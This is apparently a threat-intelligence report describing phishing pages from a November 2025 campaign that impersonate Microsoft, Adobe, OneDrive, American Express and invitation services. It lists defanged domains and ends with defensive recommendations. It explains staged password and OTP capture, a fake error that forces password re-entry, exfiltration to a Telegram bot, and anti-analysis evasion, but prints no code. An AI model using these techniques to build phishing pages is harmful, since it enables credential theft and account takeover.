Between November 06, 2025 and November 20, 2025, analysts identified a sophisticated campaign of multi-stage credential harvesting attacks primarily targeting Microsoft Office 365, OneDrive, and Adobe Cloud services, with additional incidents impersonating American Express, Paperless Post, and Greenvelope platforms. The incidents demonstrated consistently advanced TTPs including JavaScript-based credential exfiltration via AJAX/fetch() API calls, multi-factor authentication bypass techniques that collect both passwords and OTP tokens across staged authentication flows, and comprehensive anti-analysis evasion measures such as browser fingerprinting, developer tools detection, clipboard manipulation, and extensive code obfuscation using base64 encoding and randomized variable names.
Domains Reviewed
- doc-invitation[.]de/drive/
- aexluvil30g0d-u2f3hu9828y9[.]com/bad[.]php
- www[.]leor24[.]com/pages/about-us
- host[.]megiri[.]sa[.]com/1xrq6uqwubqlm2?02d14c420d706-7fafd751e4b77ecc8f...
- f005[.]backblazeb2[.]com/file/onedrive21123/onedr-updated+(6)[.]html
- newportalx0-rfpdocuments28[.]us-lax-1[.]linodeobjects[.]com/index[.]html...
- g-uts[.]learchatsfield[.]info/Eim6XF0H50EvvzIvp6lur81bkQVqYRSuPOU7JLbNTo...
- 10[.]216[.]66[.]84/?rid=WHplUmL
- authenticating[.]h-hgenexcs[.]com/AEby6xZHgH1JWjZWuzXTBTfDHdq7a0PRvNdh5Y...
- jointheagenda[.]com/invitation/
- www[.]casasabores[.]com[.]br/8bd0452e9c2623579fdb7540bab/
- brizodata[.]sbs/SHRBxvGVxSqfR01djs9chX15avPdhAGoVMEyhcXXLobGrw3uYHE1Zf3E...
On November 19, 2025, an employee at a Minnesota organization clicked the below phishing page.
This phishing page uses a multi-stage credential capture technique that initially submits credentials via AJAX POST to 'next.php', then forces a second authentication attempt before triggering an OTP collection phase that posts to 'Analysis405/otp_process.php', effectively implementing a complete account takeover flow. The page impersonates Adobe Cloud document sharing and employs several sophisticated social engineering tactics including brand impersonation with Adobe logos, urgency messaging about document access requirements, and a professional UI that mimics legitimate cloud storage authentication flows across multiple email providers (Gmail, Outlook, Yahoo, AOL, Office365).
The JavaScript implements a counter-based system that requires at least two failed login attempts before proceeding to the OTP phase, uses dynamic UI manipulation to show loading states and success messages, and includes hidden form fields to track victim email and selected provider across the multi-stage process. The infrastructure appears to be hosted on a compromised or malicious domain (doc-invitation.de) with Cloudflare protection, and the sophistication level is moderate to advanced given the multi-stage approach, realistic UI/UX design, comprehensive email provider coverage, and the seamless integration of both credential and MFA token collection in a single attack flow.
On November 17, 2025, an employee at a Florida organization clicked the below phishing page.
This phishing page uses a standard HTML form submission method to capture American Express gift card credentials, with the form posting to an unspecified endpoint when the "Sign In" button is clicked. The page demonstrates moderate sophistication through several notable TTPs: it implements Google reCAPTCHA v3 integration (likely to bypass automated detection systems), uses legitimate American Express branding and styling pulled from official CDN resources at aexp-static.com and ctfassets.net to create visual authenticity, and employs a suspicious domain structure (aexluvil30g0d-u2f3hu9828y9.com) that appears designed to evade detection while mimicking legitimate American Express services.
The page includes meta tags indicating it's hosted with "noindex, nofollow" directives to avoid search engine indexing, and incorporates multiple external script references including tracking pixels and analytics services, suggesting this is part of a larger campaign infrastructure. While the core credential capture mechanism is relatively basic form-based collection, the attention to visual fidelity, anti-indexing measures, and integration with legitimate services indicates this is a well-resourced phishing operation targeting American Express gift card users.
On November 16, 2025, an employee at a Minnesota organization clicked on a phishing page featuring inappropriate content.
Based on the provided HTML content, this appears to be a legitimate customer service widget rather than a phishing page. The code shows an extensive CSS framework with design tokens and styling for what appears to be an interactive help/feedback system, likely from a legitimate service platform. The CSS includes professional design system variables, component styling for modals, forms, accordions, and various UI elements typical of enterprise customer support widgets.
The styling suggests this is hosted on a legitimate platform using a professional design system (evidenced by the "Market Sans" font family and comprehensive CSS custom properties). The sophistication level appears to be that of a legitimate business application rather than a phishing attempt, as there are no visible credential capture forms, JavaScript exfiltration methods, or social engineering tactics in the provided code - only professional UI component styling and layout definitions.
On November 14, 2025, an employee at a Florida organization clicked the below phishing page.
This phishing page uses a sophisticated JavaScript-based credential exfiltration technique where an extremely long base64-encoded variable named "un" contains obfuscated code that is likely decoded and executed at runtime to steal credentials without using traditional form submissions. The page implements several evasion techniques including a custom copy-paste interception script that replaces clipboard content with "d" to prevent users from copying suspicious URLs, hidden HTML content with fake loading messages ("Applying dynamic environment settings"), and a minimal visible interface that displays only a generic title character "â".
The infrastructure appears to be hosted on a compromised or suspicious domain (megiri.sa.com) with a complex URL structure containing encoded parameters, and the sophistication level is advanced due to the heavy obfuscation of the main payload and the clipboard manipulation anti-analysis technique. The lack of visible login forms combined with the extensive JavaScript obfuscation suggests this is likely a real-time phishing kit or adversary-in-the-middle (AiTM) proxy that dynamically generates content based on the decoded payload.
On November 13, 2025, an employee at a Kentucky organization clicked the below phishing page.
This OneDrive-themed phishing page uses JavaScript-based credential exfiltration via fetch() API calls to send stolen credentials to both an IP geolocation service (api.ipify.org) and a Telegram bot endpoint, with the obfuscated code suggesting data is transmitted to "https://api.telegram.org/bot" followed by an encoded bot token and chat ID.
The page implements several notable TTPs including heavily obfuscated JavaScript using hex-encoded strings (extensive use of \x hex encoding throughout the code), geolocation tracking to capture victim's IP address and location data before credential theft, and sophisticated social engineering with fake Microsoft OneDrive branding, urgency messaging about "secured files" requiring sign-in, and error handling for failed login attempts. The page is hosted on Backblaze B2 cloud storage (f005.backblazeb2.com), representing abuse of legitimate cloud infrastructure, and demonstrates moderate to advanced sophistication through its multi-stage data collection (IP/location first, then credentials), real-time exfiltration to Telegram, and extensive code obfuscation to evade detection.
On November 13, 2025, an employee at a Illinois organization clicked the below phishing page.
This phishing page uses a sophisticated multi-stage credential harvesting approach that mimics Microsoft's authentication flow, collecting usernames and passwords through JavaScript form handlers that likely exfiltrate data via fetch() or similar APIs to the attacker's backend (specific endpoints not visible in provided code). The page implements several advanced evasion techniques including anti-debugging protection with performance.now() timing checks that redirect users to whatnot.com if developer tools are detected, browser/automation detection that blocks access from WebDriver/Burp/Phantom, and keyboard event blocking to prevent common developer shortcuts like F12 and Ctrl+U.
The infrastructure leverages legitimate Linode object storage (linodeobjects.com) which provides credibility and hosting resilience, while the page demonstrates high sophistication through its pixel-perfect Microsoft UI replication, complete with authentic logos, styling, animations, and multi-step authentication flow that closely mirrors the real Microsoft login experience. The inclusion of obfuscated variable names, context menu blocking, copy protection, and the targeted nature (specifically mentioning "Illinois organization" suggesting customization for specific campaigns) indicates this is likely part of a professional phishing kit rather than a basic credential harvester.
On November 12, 2025, an employee at a Kentucky organization clicked the below phishing page.
This Microsoft login phishing page uses a sophisticated multi-stage credential harvesting approach with JavaScript-based exfiltration through external scripts (K2App58iPUPf4jkUkEO.js, zpfq39alwUSGvUN.js, mh9b1iRE2q2RZNvb.js) rather than traditional form POSTs, collecting username, password, and various MFA tokens (authenticator codes, SMS codes) across multiple realistic authentication steps. The page implements several advanced evasion techniques including extensive base64 obfuscation of configuration data, randomized CSS class names and element IDs to evade detection signatures, honeypot fields for bot detection, anti-inspection CSS rules disabling text selection and right-click, and a sophisticated PageValidator security handler with development/strict presets.
Notable sophisticated features include realistic Microsoft authentication flow simulation with proper loading animations and overlays, integration with external CDN resources and Cloudflare services, and extensive use of encoded strings and randomized variable names throughout the JavaScript configuration objects. The overall sophistication level is advanced, particularly due to the multi-vector evasion techniques, realistic UI mimicry of legitimate Microsoft authentication flows, and the apparent integration with external credential collection infrastructure rather than simple form submissions.
On November 11, 2025, an employee at a Maryland organization clicked the below phishing page.
This phishing page employs a sophisticated Microsoft OAuth impersonation attack that captures credentials through a standard HTML form POST to "/common/login" on the attacker's server at 10.216.66.84, while using an elaborate base href redirect to the legitimate Microsoft login service to maintain authenticity. The most significant TTPs observed include advanced brand impersonation with comprehensive Microsoft branding and authentic-looking OAuth flow parameters, extensive JavaScript-based browser fingerprinting and client telemetry collection through the $Config object that gathers device information and user behavior, and sophisticated evasion techniques including nonce-based script execution, CSRF token implementation, and complex state management to bypass security controls.
The attack is hosted on what appears to be internal infrastructure (10.216.66.84 suggests a private network compromise), and demonstrates advanced sophistication through its use of legitimate Microsoft CDN resources (aadcdn.msftauth.net), authentic OAuth2 flow simulation with proper state tokens and PKCE implementation, and comprehensive client-side telemetry collection that would allow the attackers to profile victims and potentially bypass additional security measures.
On November 10, 2025, an employee at a Maryland organization clicked the below phishing page.
This phishing page captures credentials through a multi-stage JavaScript-based exfiltration system that likely uses fetch() or XMLHttpRequest calls (referenced through external scripts kV5MJ9LPKJXePXA.js and XQZA9ftrP63yNyTn.js) rather than traditional form submission. The page demonstrates moderate to advanced sophistication with several notable anti-analysis techniques including complete disabling of right-click and text selection, honeypot fields with class "a_section_981" positioned off-screen to detect automated bots, and extensive CSS obfuscation using randomized class names (a_widget_394, a_section_929, etc.) to hinder analysis.
The infrastructure leverages what appears to be a compromised or disposable hosting service with the suspicious domain "h-hgenexcs.com" and includes base64-encoded configuration data in the phpConfig object, along with a sophisticated PageValidator security handler that likely performs geofencing or user-agent filtering before credential collection. The presence of loading animations, Microsoft-style branding elements, and integration with legitimate services like jQuery CDN suggests this is designed to capture Microsoft/Office 365 credentials with high visual fidelity.
On November 10, 2025, an employee at a Washington organization clicked the below phishing page.
This phishing page uses a multi-stage credential capture technique with form POST submissions to "processmail.php" and "process.php", implementing a sophisticated social engineering flow that first collects email/password credentials, then deliberately shows an "Incorrect Password" error to prompt re-entry, followed by an OTP collection phase mimicking multi-factor authentication. The attack impersonates Paperless Post invitation service with brand logos and implements personalization through URL parameters (name=X) that get dynamically inserted via JavaScript typing animations, while using multiple email provider buttons (Outlook, Office365, Yahoo, Gmail, AOL) to increase victim targeting.
The page demonstrates moderate sophistication with its multi-modal interface using Bootstrap modals, AJAX-based form handling to prevent page reloads, a fake countdown timer for OTP urgency, and anti-resubmission logic, though it lacks advanced evasion techniques like geofencing or code obfuscation. Notably, the Gmail button redirects to an external domain "vipinvites.de/accounts.google" while other providers use local processing, and the page includes Cloudflare challenge scripts indicating it's likely using Cloudflare's services for hosting and bot protection.
On November 10, 2025, an employee at a Kentucky organization clicked the below phishing page.
This phishing page uses a multi-stage credential harvesting approach with form POST submissions to "processmail.php" for initial credentials and "process.php" for OTP collection, implementing a sophisticated three-stage attack flow that first displays "Incorrect Password" to prompt re-entry, then requests phone-based OTP verification to bypass multi-factor authentication.
The site impersonates Greenvelope (online invitations service) while offering multiple email provider login options (Outlook, Office365, Yahoo, AOL), employs jQuery AJAX for seamless credential submission without page reloads, and includes realistic social engineering elements like countdown timers, loading animations, and fake OTP delivery notifications. The attack is hosted on a compromised legitimate domain (casasabores.com.br) with a random hash path (/8bd0452e9c2623579fdb7540bab/), demonstrating moderate to advanced sophistication through its MFA bypass capability and multi-stage collection process designed to capture both passwords and second-factor authentication tokens.
On November 06, 2025, an employee at a Maryland organization clicked the below phishing page.
This Microsoft Office/Outlook phishing page uses multi-stage credential harvesting through AJAX POST requests to endpoints defined in external JavaScript files (r2oWoZJ0N0G519B.js, cPpooj21cLe5yfmc.js, QnO84eeFjEjonC2aJQC.js), collecting username, password, and MFA codes across separate form submissions with real-time validation. The page employs moderate sophistication with extensive anti-analysis measures including honeypot fields for bot detection, disabled text selection and right-click context menus, obfuscated class names and IDs using randomized alphanumeric strings, and base64-encoded configuration data stored in window variables like var_state_347 and var_settings_403.
Key evasion techniques include a security validation system (PageValidator.create) that likely performs environment checks, CSS-based content hiding until validation passes, and integration with an external CDN-hosted library from statically.io for additional functionality. The multi-step authentication simulation is particularly sophisticated, mimicking legitimate Microsoft MFA flows including SMS verification, authenticator app approval with animated number displays, and various 2FA backup options, making this a notably advanced credential harvesting operation rather than a basic form-based phish.
Recommendations
- Implement email security controls to flag messages containing links to newly registered domains or suspicious domain patterns (e.g., domains with random character strings, recently registered .de, .com, .info, .sbs TLDs)
- Configure URL filtering and web proxies to detect and block access to domains exhibiting suspicious patterns like excessive random characters, base64-encoded parameters, or hosting on compromised legitimate websites
- Deploy enhanced monitoring for legitimate cloud storage services (Backblaze, Linode, etc.) by flagging external emails containing links to these platforms and requiring additional verification for document access requests
- Enable advanced threat protection features that can detect JavaScript obfuscation techniques, including base64 encoding, hex-encoded strings, and clipboard manipulation scripts commonly used in sophisticated phishing kits
- Implement conditional access policies that flag authentication attempts from suspicious IP ranges (including private network ranges like 10.x.x.x when accessed externally) and require additional verification for Office 365 login attempts
- Conduct targeted user awareness training focused on recognizing multi-stage authentication phishing, fake error messages requesting password re-entry, and urgency tactics around OTP/MFA token requests
- Deploy endpoint detection capabilities that can identify and block anti-debugging techniques such as developer tool detection, right-click blocking, and performance timing checks used by advanced phishing pages
